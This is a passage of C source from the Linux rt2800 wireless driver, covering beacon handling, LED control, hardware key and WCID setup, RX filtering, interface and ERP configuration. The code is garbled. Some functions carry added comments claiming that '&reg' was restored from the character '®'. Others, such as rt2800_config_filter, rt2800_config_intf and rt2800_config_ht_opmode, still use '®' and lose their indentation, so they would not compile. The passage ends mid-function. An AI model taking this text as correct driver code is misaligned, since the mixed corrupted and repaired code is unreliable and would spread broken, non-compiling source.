	rt2x00_set_field32(&bssid_dw1, MAC_BSSID_DW1_BSS_BCN_NUM,
			   bcn_num > 0 ? bcn_num - 1 : 0);
	rt2800_register_write(rt2x00dev, MAC_BSSID_DW1, bssid_dw1);
}
/*
 * Upload a beacon frame (TXWI + padded frame data) into the hardware
 * beacon registers. Beaconing is temporarily disabled around the update
 * to avoid transmitting partially-written data.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
void rt2800_write_beacon(struct queue_entry *entry, struct txentry_desc *txdesc)
{
	struct rt2x00_dev *rt2x00dev = entry->queue->rt2x00dev;
	struct skb_frame_desc *skbdesc = get_skb_frame_desc(entry->skb);
	unsigned int beacon_base;
	unsigned int padding_len;
	u32 orig_reg, reg;
	const int txwi_desc_size = entry->queue->winfo_size;

	/*
	 * Disable beaconing while we are reloading the beacon data,
	 * otherwise we might be sending out invalid data.
	 */
	rt2800_register_read(rt2x00dev, BCN_TIME_CFG, &reg);
	orig_reg = reg;
	rt2x00_set_field32(&reg, BCN_TIME_CFG_BEACON_GEN, 0);
	rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);

	/*
	 * Add space for the TXWI in front of the skb.
	 */
	memset(skb_push(entry->skb, txwi_desc_size), 0, txwi_desc_size);

	/*
	 * Register descriptor details in skb frame descriptor.
	 */
	skbdesc->flags |= SKBDESC_DESC_IN_SKB;
	skbdesc->desc = entry->skb->data;
	skbdesc->desc_len = txwi_desc_size;

	/*
	 * Add the TXWI for the beacon to the skb.
	 */
	rt2800_write_tx_data(entry, txdesc);

	/*
	 * Dump beacon to userspace through debugfs.
	 */
	rt2x00debug_dump_frame(rt2x00dev, DUMP_FRAME_BEACON, entry->skb);

	/*
	 * Write entire beacon with TXWI and padding to register.
	 */
	padding_len = roundup(entry->skb->len, 4) - entry->skb->len;
	if (padding_len && skb_pad(entry->skb, padding_len)) {
		rt2x00_err(rt2x00dev, "Failure padding beacon, aborting\n");
		/* skb freed by skb_pad() on failure */
		entry->skb = NULL;
		rt2800_register_write(rt2x00dev, BCN_TIME_CFG, orig_reg);
		return;
	}

	beacon_base = rt2800_hw_beacon_base(rt2x00dev, entry->entry_idx);

	rt2800_register_multiwrite(rt2x00dev, beacon_base, entry->skb->data,
				   entry->skb->len + padding_len);
	__set_bit(ENTRY_BCN_ENABLED, &entry->flags);

	/*
	 * Change global beacons settings.
	 */
	rt2800_update_beacons_setup(rt2x00dev);

	/*
	 * Restore beaconing state.
	 */
	rt2800_register_write(rt2x00dev, BCN_TIME_CFG, orig_reg);

	/*
	 * Clean up beacon skb.
	 */
	dev_kfree_skb_any(entry->skb);
	entry->skb = NULL;
}
EXPORT_SYMBOL_GPL(rt2800_write_beacon);
/*
 * Invalidate beacon slot @index by zeroing its TXWI words in the
 * hardware beacon base registers.
 */
static inline void rt2800_clear_beacon_register(struct rt2x00_dev *rt2x00dev,
						unsigned int index)
{
	int i;
	const int txwi_desc_size = rt2x00dev->bcn->winfo_size;
	unsigned int beacon_base;

	beacon_base = rt2800_hw_beacon_base(rt2x00dev, index);

	/*
	 * For the Beacon base registers we only need to clear
	 * the whole TXWI which (when set to 0) will invalidate
	 * the entire beacon.
	 */
	for (i = 0; i < txwi_desc_size; i += sizeof(__le32))
		rt2800_register_write(rt2x00dev, beacon_base + i, 0);
}
/*
 * Remove the beacon of @entry from hardware and refresh the global
 * beacon bookkeeping. Beaconing is paused during the update.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
void rt2800_clear_beacon(struct queue_entry *entry)
{
	struct rt2x00_dev *rt2x00dev = entry->queue->rt2x00dev;
	u32 orig_reg, reg;

	/*
	 * Disable beaconing while we are reloading the beacon data,
	 * otherwise we might be sending out invalid data.
	 */
	rt2800_register_read(rt2x00dev, BCN_TIME_CFG, &orig_reg);
	reg = orig_reg;
	rt2x00_set_field32(&reg, BCN_TIME_CFG_BEACON_GEN, 0);
	rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);

	/*
	 * Clear beacon.
	 */
	rt2800_clear_beacon_register(rt2x00dev, entry->entry_idx);
	__clear_bit(ENTRY_BCN_ENABLED, &entry->flags);

	/*
	 * Change global beacons settings.
	 */
	rt2800_update_beacons_setup(rt2x00dev);

	/*
	 * Restore beaconing state.
	 */
	rt2800_register_write(rt2x00dev, BCN_TIME_CFG, orig_reg);
}
EXPORT_SYMBOL_GPL(rt2800_clear_beacon);
#ifdef CPTCFG_RT2X00_LIB_DEBUGFS
/* debugfs register-access descriptors for the rt2800 family. */
const struct rt2x00debug rt2800_rt2x00debug = {
	.owner	= THIS_MODULE,
	.csr	= {
		.read		= rt2800_register_read,
		.write		= rt2800_register_write,
		.flags		= RT2X00DEBUGFS_OFFSET,
		.word_base	= CSR_REG_BASE,
		.word_size	= sizeof(u32),
		.word_count	= CSR_REG_SIZE / sizeof(u32),
	},
	.eeprom	= {
		/* NOTE: The local EEPROM access functions can't
		 * be used here, use the generic versions instead.
		 */
		.read		= rt2x00_eeprom_read,
		.write		= rt2x00_eeprom_write,
		.word_base	= EEPROM_BASE,
		.word_size	= sizeof(u16),
		.word_count	= EEPROM_SIZE / sizeof(u16),
	},
	.bbp	= {
		.read		= rt2800_bbp_read,
		.write		= rt2800_bbp_write,
		.word_base	= BBP_BASE,
		.word_size	= sizeof(u8),
		.word_count	= BBP_SIZE / sizeof(u8),
	},
	.rf	= {
		.read		= rt2x00_rf_read,
		.write		= rt2800_rf_write,
		.word_base	= RF_BASE,
		.word_size	= sizeof(u32),
		.word_count	= RF_SIZE / sizeof(u32),
	},
	.rfcsr	= {
		.read		= rt2800_rfcsr_read,
		.write		= rt2800_rfcsr_write,
		.word_base	= RFCSR_BASE,
		.word_size	= sizeof(u8),
		.word_count	= RFCSR_SIZE / sizeof(u8),
	},
};
EXPORT_SYMBOL_GPL(rt2800_rt2x00debug);
#endif /* CPTCFG_RT2X00_LIB_DEBUGFS */
/*
 * Poll the hardware rfkill GPIO; the register used depends on whether
 * the device is an RT3290 combo chip. Returns the raw GPIO bit value.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
int rt2800_rfkill_poll(struct rt2x00_dev *rt2x00dev)
{
	u32 reg;

	if (rt2x00_rt(rt2x00dev, RT3290)) {
		rt2800_register_read(rt2x00dev, WLAN_FUN_CTRL, &reg);
		return rt2x00_get_field32(reg, WLAN_GPIO_IN_BIT0);
	} else {
		rt2800_register_read(rt2x00dev, GPIO_CTRL, &reg);
		return rt2x00_get_field32(reg, GPIO_CTRL_VAL2);
	}
}
EXPORT_SYMBOL_GPL(rt2800_rfkill_poll);
#ifdef CPTCFG_RT2X00_LIB_LEDS
static void rt2800_brightness_set(struct led_classdev *led_cdev,
enum led_brightness brightness)
{
struct rt2x00_led *led =
container_of(led_cdev, struct rt2x00_led, led_dev);
unsigned int enabled = brightness != LED_OFF;
unsigned int bg_mode =
(enabled && led->rt2x00dev->curr_band == IEEE80211_BAND_2GHZ);
unsigned int polarity =
rt2x00_get_field16(led->rt2x00dev->led_mcu_reg,
EEPROM_FREQ_LED_POLARITY);
unsigned int ledmode =
rt2x00_get_field16(led->rt2x00dev->led_mcu_reg,
EEPROM_FREQ_LED_MODE);
u32 reg;
/* Check for SoC (SOC devices don't support MCU requests) */
if (rt2x00_is_soc(led->rt2x00dev)) {
rt2800_register_read(led->rt2x00dev, LED_CFG, ®);
/* Set LED Polarity */
rt2x00_set_field32(®, LED_CFG_LED_POLAR, polarity);
/* Set LED Mode */
if (led->type == LED_TYPE_RADIO) {
rt2x00_set_field32(®, LED_CFG_G_LED_MODE,
enabled ? 3 : 0);
} else if (led->type == LED_TYPE_ASSOC) {
rt2x00_set_field32(®, LED_CFG_Y_LED_MODE,
enabled ? 3 : 0);
} else if (led->type == LED_TYPE_QUALITY) {
rt2x00_set_field32(®, LED_CFG_R_LED_MODE,
enabled ? 3 : 0);
}
rt2800_register_write(led->rt2x00dev, LED_CFG, reg);
} else {
if (led->type == LED_TYPE_RADIO) {
rt2800_mcu_request(led->rt2x00dev, MCU_LED, 0xff, ledmode,
enabled ? 0x20 : 0);
} else if (led->type == LED_TYPE_ASSOC) {
rt2800_mcu_request(led->rt2x00dev, MCU_LED, 0xff, ledmode,
enabled ? (bg_mode ? 0x60 : 0xa0) : 0x20);
} else if (led->type == LED_TYPE_QUALITY) {
/*
* The brightness is divided into 6 levels (0 - 5),
* The specs tell us the following levels:
* 0, 1 ,3, 7, 15, 31
* to determine the level in a simple way we can simply
* work with bitshifting:
* (1 << level) - 1
*/
rt2800_mcu_request(led->rt2x00dev, MCU_LED_STRENGTH, 0xff,
(1 << brightness / (LED_FULL / 6)) - 1,
polarity);
}
}
}
/* Initialize an rt2x00 LED descriptor and hook up the brightness callback. */
static void rt2800_init_led(struct rt2x00_dev *rt2x00dev,
			    struct rt2x00_led *led, enum led_type type)
{
	led->flags = LED_INITIALIZED;
	led->type = type;
	led->rt2x00dev = rt2x00dev;
	led->led_dev.brightness_set = rt2800_brightness_set;
}
#endif /* CPTCFG_RT2X00_LIB_LEDS */
/*
* Configuration handlers.
*/
/*
 * Program the MAC address for WCID entry @wcid. A NULL @address leaves
 * the entry filled with 0xff, which clears the association.
 */
static void rt2800_config_wcid(struct rt2x00_dev *rt2x00dev,
			       const u8 *address,
			       int wcid)
{
	struct mac_wcid_entry wcid_entry;
	u32 offset;

	offset = MAC_WCID_ENTRY(wcid);

	memset(&wcid_entry, 0xff, sizeof(wcid_entry));
	if (address)
		memcpy(wcid_entry.mac, address, ETH_ALEN);

	rt2800_register_multiwrite(rt2x00dev, offset,
				   &wcid_entry, sizeof(wcid_entry));
}
/* Zero the attribute entry of WCID @wcid, removing all of its settings. */
static void rt2800_delete_wcid_attr(struct rt2x00_dev *rt2x00dev, int wcid)
{
	rt2800_register_write(rt2x00dev, MAC_WCID_ATTR_ENTRY(wcid), 0);
}
/*
 * Store the BSS index for WCID @wcid in its attribute entry; the 4-bit
 * index is split into a 3-bit main field plus a 1-bit extension.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
static void rt2800_config_wcid_attr_bssidx(struct rt2x00_dev *rt2x00dev,
					   int wcid, u32 bssidx)
{
	u32 offset = MAC_WCID_ATTR_ENTRY(wcid);
	u32 reg;

	/*
	 * The BSS Idx numbers is split in a main value of 3 bits,
	 * and a extended field for adding one additional bit to the value.
	 */
	rt2800_register_read(rt2x00dev, offset, &reg);
	rt2x00_set_field32(&reg, MAC_WCID_ATTRIBUTE_BSS_IDX, (bssidx & 0x7));
	rt2x00_set_field32(&reg, MAC_WCID_ATTRIBUTE_BSS_IDX_EXT,
			   (bssidx & 0x8) >> 3);
	rt2800_register_write(rt2x00dev, offset, reg);
}
static void rt2800_config_wcid_attr_cipher(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_crypto *crypto,
struct ieee80211_key_conf *key)
{
struct mac_iveiv_entry iveiv_entry;
u32 offset;
u32 reg;
offset = MAC_WCID_ATTR_ENTRY(key->hw_key_idx);
if (crypto->cmd == SET_KEY) {
rt2800_register_read(rt2x00dev, offset, ®);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_KEYTAB,
!!(key->flags & IEEE80211_KEY_FLAG_PAIRWISE));
/*
* Both the cipher as the BSS Idx numbers are split in a main
* value of 3 bits, and a extended field for adding one additional
* bit to the value.
*/
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_CIPHER,
(crypto->cipher & 0x7));
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_CIPHER_EXT,
(crypto->cipher & 0x8) >> 3);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_RX_WIUDF, crypto->cipher);
rt2800_register_write(rt2x00dev, offset, reg);
} else {
/* Delete the cipher without touching the bssidx */
rt2800_register_read(rt2x00dev, offset, ®);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_KEYTAB, 0);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_CIPHER, 0);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_CIPHER_EXT, 0);
rt2x00_set_field32(®, MAC_WCID_ATTRIBUTE_RX_WIUDF, 0);
rt2800_register_write(rt2x00dev, offset, reg);
}
offset = MAC_IVEIV_ENTRY(key->hw_key_idx);
memset(&iveiv_entry, 0, sizeof(iveiv_entry));
if ((crypto->cipher == CIPHER_TKIP) ||
(crypto->cipher == CIPHER_TKIP_NO_MIC) ||
(crypto->cipher == CIPHER_AES))
iveiv_entry.iv[3] |= 0x20;
iveiv_entry.iv[3] |= key->keyidx << 6;
rt2800_register_multiwrite(rt2x00dev, offset,
&iveiv_entry, sizeof(iveiv_entry));
}
/*
 * Configure a shared (group) key.
 *
 * On SET_KEY the key material (key + TX/RX MIC) is written to the
 * shared key entry selected by bssidx and key index; in all cases the
 * per-key cipher mode and the WCID information are updated.  For a
 * delete, (crypto->cmd == SET_KEY) evaluates to 0 so the cipher mode
 * field is cleared.
 *
 * Fix: restored "&reg" where extraction had mangled it into "®".
 */
int rt2800_config_shared_key(struct rt2x00_dev *rt2x00dev,
			     struct rt2x00lib_crypto *crypto,
			     struct ieee80211_key_conf *key)
{
	struct hw_key_entry key_entry;
	struct rt2x00_field32 field;
	u32 offset;
	u32 reg;

	if (crypto->cmd == SET_KEY) {
		key->hw_key_idx = (4 * crypto->bssidx) + key->keyidx;

		memcpy(key_entry.key, crypto->key,
		       sizeof(key_entry.key));
		memcpy(key_entry.tx_mic, crypto->tx_mic,
		       sizeof(key_entry.tx_mic));
		memcpy(key_entry.rx_mic, crypto->rx_mic,
		       sizeof(key_entry.rx_mic));

		offset = SHARED_KEY_ENTRY(key->hw_key_idx);
		rt2800_register_multiwrite(rt2x00dev, offset,
					   &key_entry, sizeof(key_entry));
	}

	/*
	 * The cipher types are stored over multiple registers
	 * starting with SHARED_KEY_MODE_BASE each word will have
	 * 32 bits and contains the cipher types for 2 bssidx each.
	 * Using the correct defines correctly will cause overhead,
	 * so just calculate the correct offset.
	 */
	field.bit_offset = 4 * (key->hw_key_idx % 8);
	field.bit_mask = 0x7 << field.bit_offset;

	offset = SHARED_KEY_MODE_ENTRY(key->hw_key_idx / 8);
	rt2800_register_read(rt2x00dev, offset, &reg);
	rt2x00_set_field32(&reg, field,
			   (crypto->cmd == SET_KEY) * crypto->cipher);
	rt2800_register_write(rt2x00dev, offset, reg);

	/*
	 * Update WCID information
	 */
	rt2800_config_wcid(rt2x00dev, crypto->address, key->hw_key_idx);
	rt2800_config_wcid_attr_bssidx(rt2x00dev, key->hw_key_idx,
				       crypto->bssidx);
	rt2800_config_wcid_attr_cipher(rt2x00dev, crypto, key);

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_config_shared_key);
/*
 * Configure a pairwise key for a station.  The key material is only
 * uploaded on SET_KEY and only for STAs with a valid hardware WCID;
 * the WCID cipher attributes are refreshed in every case.
 */
int rt2800_config_pairwise_key(struct rt2x00_dev *rt2x00dev,
			       struct rt2x00lib_crypto *crypto,
			       struct ieee80211_key_conf *key)
{
	struct hw_key_entry key_entry;

	if (crypto->cmd == SET_KEY) {
		/*
		 * Allow key configuration only for STAs that are
		 * known by the hw.
		 */
		if (crypto->wcid > WCID_END)
			return -ENOSPC;

		key->hw_key_idx = crypto->wcid;

		memcpy(key_entry.key, crypto->key, sizeof(key_entry.key));
		memcpy(key_entry.tx_mic, crypto->tx_mic,
		       sizeof(key_entry.tx_mic));
		memcpy(key_entry.rx_mic, crypto->rx_mic,
		       sizeof(key_entry.rx_mic));

		rt2800_register_multiwrite(rt2x00dev,
					   PAIRWISE_KEY_ENTRY(key->hw_key_idx),
					   &key_entry, sizeof(key_entry));
	}

	/*
	 * Update WCID information
	 */
	rt2800_config_wcid_attr_cipher(rt2x00dev, crypto, key);

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_config_pairwise_key);
/*
 * Allocate a hardware WCID for a newly added station and program its
 * address and BSS index.  Running out of WCIDs is not an error: the
 * STA simply stays out of the hardware table.
 */
int rt2800_sta_add(struct rt2x00_dev *rt2x00dev, struct ieee80211_vif *vif,
		   struct ieee80211_sta *sta)
{
	struct rt2x00_sta *sta_priv = sta_to_rt2x00_sta(sta);
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
	int wcid;

	/* Pick the lowest free WCID slot. */
	wcid = find_first_zero_bit(drv_data->sta_ids, STA_IDS_SIZE) + WCID_START;

	/*
	 * Record the selected wcid even when it is out of range, so that
	 * later code can tell whether the STA was uploaded to the hw.
	 */
	sta_priv->wcid = wcid;

	/*
	 * No space left in the device; communication with the STA still
	 * works, so report success.
	 */
	if (wcid > WCID_END)
		return 0;

	__set_bit(wcid - WCID_START, drv_data->sta_ids);

	/* Wipe stale WCID attributes, then program address and bssidx. */
	rt2800_delete_wcid_attr(rt2x00dev, wcid);
	rt2800_config_wcid(rt2x00dev, sta->addr, wcid);
	rt2800_config_wcid_attr_bssidx(rt2x00dev, wcid,
				       rt2x00lib_get_bssidx(rt2x00dev, vif));

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_sta_add);
/*
 * Release a station's hardware WCID.  Out-of-range WCIDs were never in
 * the hardware table, so there is nothing to do for them.
 */
int rt2800_sta_remove(struct rt2x00_dev *rt2x00dev, int wcid)
{
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;

	if (wcid > WCID_END)
		return 0;

	/*
	 * Invalidate the WCID entry; the attributes are left alone as
	 * they get renewed when the WCID is reused.
	 */
	rt2800_config_wcid(rt2x00dev, NULL, wcid);
	__clear_bit(wcid - WCID_START, drv_data->sta_ids);

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_sta_remove);
void rt2800_config_filter(struct rt2x00_dev *rt2x00dev,
const unsigned int filter_flags)
{
u32 reg;
/*
* Start configuration steps.
* Note that the version error will always be dropped
* and broadcast frames will always be accepted since
* there is no filter for it at this time.
*/
rt2800_register_read(rt2x00dev, RX_FILTER_CFG, ®);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CRC_ERROR,
!(filter_flags & FIF_FCSFAIL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_PHY_ERROR,
!(filter_flags & FIF_PLCPFAIL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_NOT_TO_ME, 1);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_NOT_MY_BSSD, 0);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_VER_ERROR, 1);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_MULTICAST,
!(filter_flags & FIF_ALLMULTI));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_BROADCAST, 0);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_DUPLICATE, 1);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CF_END_ACK,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CF_END,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_ACK,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CTS,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_RTS,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_PSPOLL,
!(filter_flags & FIF_PSPOLL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_BA, 0);
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_BAR,
!(filter_flags & FIF_CONTROL));
rt2x00_set_field32(®, RX_FILTER_CFG_DROP_CNTL,
!(filter_flags & FIF_CONTROL));
rt2800_register_write(rt2x00dev, RX_FILTER_CFG, reg);
}
EXPORT_SYMBOL_GPL(rt2800_config_filter);
void rt2800_config_intf(struct rt2x00_dev *rt2x00dev, struct rt2x00_intf *intf,
struct rt2x00intf_conf *conf, const unsigned int flags)
{
u32 reg;
bool update_bssid = false;
if (flags & CONFIG_UPDATE_TYPE) {
/*
* Enable synchronisation.
*/
rt2800_register_read(rt2x00dev, BCN_TIME_CFG, ®);
rt2x00_set_field32(®, BCN_TIME_CFG_TSF_SYNC, conf->sync);
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);
if (conf->sync == TSF_SYNC_AP_NONE) {
/*
* Tune beacon queue transmit parameters for AP mode
*/
rt2800_register_read(rt2x00dev, TBTT_SYNC_CFG, ®);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_CWMIN, 0);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_AIFSN, 1);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_EXP_WIN, 32);
rt2x00_set_field32(®, TBTT_SYNC_CFG_TBTT_ADJUST, 0);
rt2800_register_write(rt2x00dev, TBTT_SYNC_CFG, reg);
} else {
rt2800_register_read(rt2x00dev, TBTT_SYNC_CFG, ®);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_CWMIN, 4);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_AIFSN, 2);
rt2x00_set_field32(®, TBTT_SYNC_CFG_BCN_EXP_WIN, 32);
rt2x00_set_field32(®, TBTT_SYNC_CFG_TBTT_ADJUST, 16);
rt2800_register_write(rt2x00dev, TBTT_SYNC_CFG, reg);
}
}
if (flags & CONFIG_UPDATE_MAC) {
if (flags & CONFIG_UPDATE_TYPE &&
conf->sync == TSF_SYNC_AP_NONE) {
/*
* The BSSID register has to be set to our own mac
* address in AP mode.
*/
memcpy(conf->bssid, conf->mac, sizeof(conf->mac));
update_bssid = true;
}
if (!is_zero_ether_addr((const u8 *)conf->mac)) {
reg = le32_to_cpu(conf->mac[1]);
rt2x00_set_field32(®, MAC_ADDR_DW1_UNICAST_TO_ME_MASK, 0xff);
conf->mac[1] = cpu_to_le32(reg);
}
rt2800_register_multiwrite(rt2x00dev, MAC_ADDR_DW0,
conf->mac, sizeof(conf->mac));
}
if ((flags & CONFIG_UPDATE_BSSID) || update_bssid) {
if (!is_zero_ether_addr((const u8 *)conf->bssid)) {
reg = le32_to_cpu(conf->bssid[1]);
rt2x00_set_field32(®, MAC_BSSID_DW1_BSS_ID_MASK, 3);
rt2x00_set_field32(®, MAC_BSSID_DW1_BSS_BCN_NUM, 0);
conf->bssid[1] = cpu_to_le32(reg);
}
rt2800_register_multiwrite(rt2x00dev, MAC_BSSID_DW0,
conf->bssid, sizeof(conf->bssid));
}
}
EXPORT_SYMBOL_GPL(rt2800_config_intf);
static void rt2800_config_ht_opmode(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_erp *erp)
{
bool any_sta_nongf = !!(erp->ht_opmode &
IEEE80211_HT_OP_MODE_NON_GF_STA_PRSNT);
u8 protection = erp->ht_opmode & IEEE80211_HT_OP_MODE_PROTECTION;
u8 mm20_mode, mm40_mode, gf20_mode, gf40_mode;
u16 mm20_rate, mm40_rate, gf20_rate, gf40_rate;
u32 reg;
/* default protection rate for HT20: OFDM 24M */
mm20_rate = gf20_rate = 0x4004;
/* default protection rate for HT40: duplicate OFDM 24M */
mm40_rate = gf40_rate = 0x4084;
switch (protection) {
case IEEE80211_HT_OP_MODE_PROTECTION_NONE:
/*
* All STAs in this BSS are HT20/40 but there might be
* STAs not supporting greenfield mode.
* => Disable protection for HT transmissions.
*/
mm20_mode = mm40_mode = gf20_mode = gf40_mode = 0;
break;
case IEEE80211_HT_OP_MODE_PROTECTION_20MHZ:
/*
* All STAs in this BSS are HT20 or HT20/40 but there
* might be STAs not supporting greenfield mode.
* => Protect all HT40 transmissions.
*/
mm20_mode = gf20_mode = 0;
mm40_mode = gf40_mode = 2;
break;
case IEEE80211_HT_OP_MODE_PROTECTION_NONMEMBER:
/*
* Nonmember protection:
* According to 802.11n we _should_ protect all
* HT transmissions (but we don't have to).
*
* But if cts_protection is enabled we _shall_ protect
* all HT transmissions using a CCK rate.
*
* And if any station is non GF we _shall_ protect
* GF transmissions.
*
* We decide to protect everything
* -> fall through to mixed mode.
*/
case IEEE80211_HT_OP_MODE_PROTECTION_NONHT_MIXED:
/*
* Legacy STAs are present
* => Protect all HT transmissions.
*/
mm20_mode = mm40_mode = gf20_mode = gf40_mode = 2;
/*
* If erp protection is needed we have to protect HT
* transmissions with CCK 11M long preamble.
*/
if (erp->cts_protection) {
/* don't duplicate RTS/CTS in CCK mode */
mm20_rate = mm40_rate = 0x0003;
gf20_rate = gf40_rate = 0x0003;
}
break;
}
/* check for STAs not supporting greenfield mode */
if (any_sta_nongf)
gf20_mode = gf40_mode = 2;
/* Update HT protection config */
rt2800_register_read(rt2x00dev, MM20_PROT_CFG, ®);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_RATE, mm20_rate);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_CTRL, mm20_mode);
rt2800_register_write(rt2x00dev, MM20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, MM40_PROT_CFG, ®);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_RATE, mm40_rate);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_CTRL, mm40_mode);
rt2800_register_write(rt2x00dev, MM40_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF20_PROT_CFG, ®);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_RATE, gf20_rate);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_CTRL, gf20_mode);
rt2800_register_write(rt2x00dev, GF20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF40_PROT_CFG, ®);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_RATE, gf40_rate);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_CTRL, gf40_mode);
rt2800_register_write(rt2x00dev, GF40_PROT_CFG, reg);
}
/*
 * Apply ERP-related BSS changes: preamble, CTS protection, basic
 * rates, slot/EIFS timing, beacon interval and HT operation mode.
 * Only sections flagged in @changed are touched.
 *
 * Fix: restored "&reg" where extraction had mangled it into "®".
 */
void rt2800_config_erp(struct rt2x00_dev *rt2x00dev, struct rt2x00lib_erp *erp,
		       u32 changed)
{
	u32 reg;

	if (changed & BSS_CHANGED_ERP_PREAMBLE) {
		rt2800_register_read(rt2x00dev, AUTO_RSP_CFG, &reg);
		rt2x00_set_field32(&reg, AUTO_RSP_CFG_BAC_ACK_POLICY,
				   !!erp->short_preamble);
		rt2x00_set_field32(&reg, AUTO_RSP_CFG_AR_PREAMBLE,
				   !!erp->short_preamble);
		rt2800_register_write(rt2x00dev, AUTO_RSP_CFG, reg);
	}

	if (changed & BSS_CHANGED_ERP_CTS_PROT) {
		rt2800_register_read(rt2x00dev, OFDM_PROT_CFG, &reg);
		rt2x00_set_field32(&reg, OFDM_PROT_CFG_PROTECT_CTRL,
				   erp->cts_protection ? 2 : 0);
		rt2800_register_write(rt2x00dev, OFDM_PROT_CFG, reg);
	}

	if (changed & BSS_CHANGED_BASIC_RATES) {
		rt2800_register_write(rt2x00dev, LEGACY_BASIC_RATE,
				      erp->basic_rates);
		rt2800_register_write(rt2x00dev, HT_BASIC_RATE, 0x00008003);
	}

	if (changed & BSS_CHANGED_ERP_SLOT) {
		rt2800_register_read(rt2x00dev, BKOFF_SLOT_CFG, &reg);
		rt2x00_set_field32(&reg, BKOFF_SLOT_CFG_SLOT_TIME,
				   erp->slot_time);
		rt2800_register_write(rt2x00dev, BKOFF_SLOT_CFG, reg);

		rt2800_register_read(rt2x00dev, XIFS_TIME_CFG, &reg);
		rt2x00_set_field32(&reg, XIFS_TIME_CFG_EIFS, erp->eifs);
		rt2800_register_write(rt2x00dev, XIFS_TIME_CFG, reg);
	}

	if (changed & BSS_CHANGED_BEACON_INT) {
		rt2800_register_read(rt2x00dev, BCN_TIME_CFG, &reg);
		/* Beacon interval register is in units of 1/16 TU. */
		rt2x00_set_field32(&reg, BCN_TIME_CFG_BEACON_INTERVAL,
				   erp->beacon_int * 16);
		rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);
	}

	if (changed & BSS_CHANGED_HT)
		rt2800_config_ht_opmode(rt2x00dev, erp);
}
EXPORT_SYMBOL_GPL(rt2800_config_erp);
/*
 * Band-dependent antenna/LED setup for RT3572 devices with BT
 * coexistence: switch the antenna GPIOs with the current band and
 * swap the G/R LED modes, either directly or via the MCU depending
 * on the EEPROM LED mode.
 *
 * Fix: restored "&reg" where extraction had mangled it into "®".
 */
static void rt2800_config_3572bt_ant(struct rt2x00_dev *rt2x00dev)
{
	u32 reg;
	u16 eeprom;
	u8 led_ctrl, led_g_mode, led_r_mode;

	rt2800_register_read(rt2x00dev, GPIO_SWITCH, &reg);
	if (rt2x00dev->curr_band == IEEE80211_BAND_5GHZ) {
		rt2x00_set_field32(&reg, GPIO_SWITCH_0, 1);
		rt2x00_set_field32(&reg, GPIO_SWITCH_1, 1);
	} else {
		rt2x00_set_field32(&reg, GPIO_SWITCH_0, 0);
		rt2x00_set_field32(&reg, GPIO_SWITCH_1, 0);
	}
	rt2800_register_write(rt2x00dev, GPIO_SWITCH, reg);

	rt2800_register_read(rt2x00dev, LED_CFG, &reg);
	led_g_mode = rt2x00_get_field32(reg, LED_CFG_LED_POLAR) ? 3 : 0;
	led_r_mode = rt2x00_get_field32(reg, LED_CFG_LED_POLAR) ? 0 : 3;
	if (led_g_mode != rt2x00_get_field32(reg, LED_CFG_G_LED_MODE) ||
	    led_r_mode != rt2x00_get_field32(reg, LED_CFG_R_LED_MODE)) {
		rt2800_eeprom_read(rt2x00dev, EEPROM_FREQ, &eeprom);
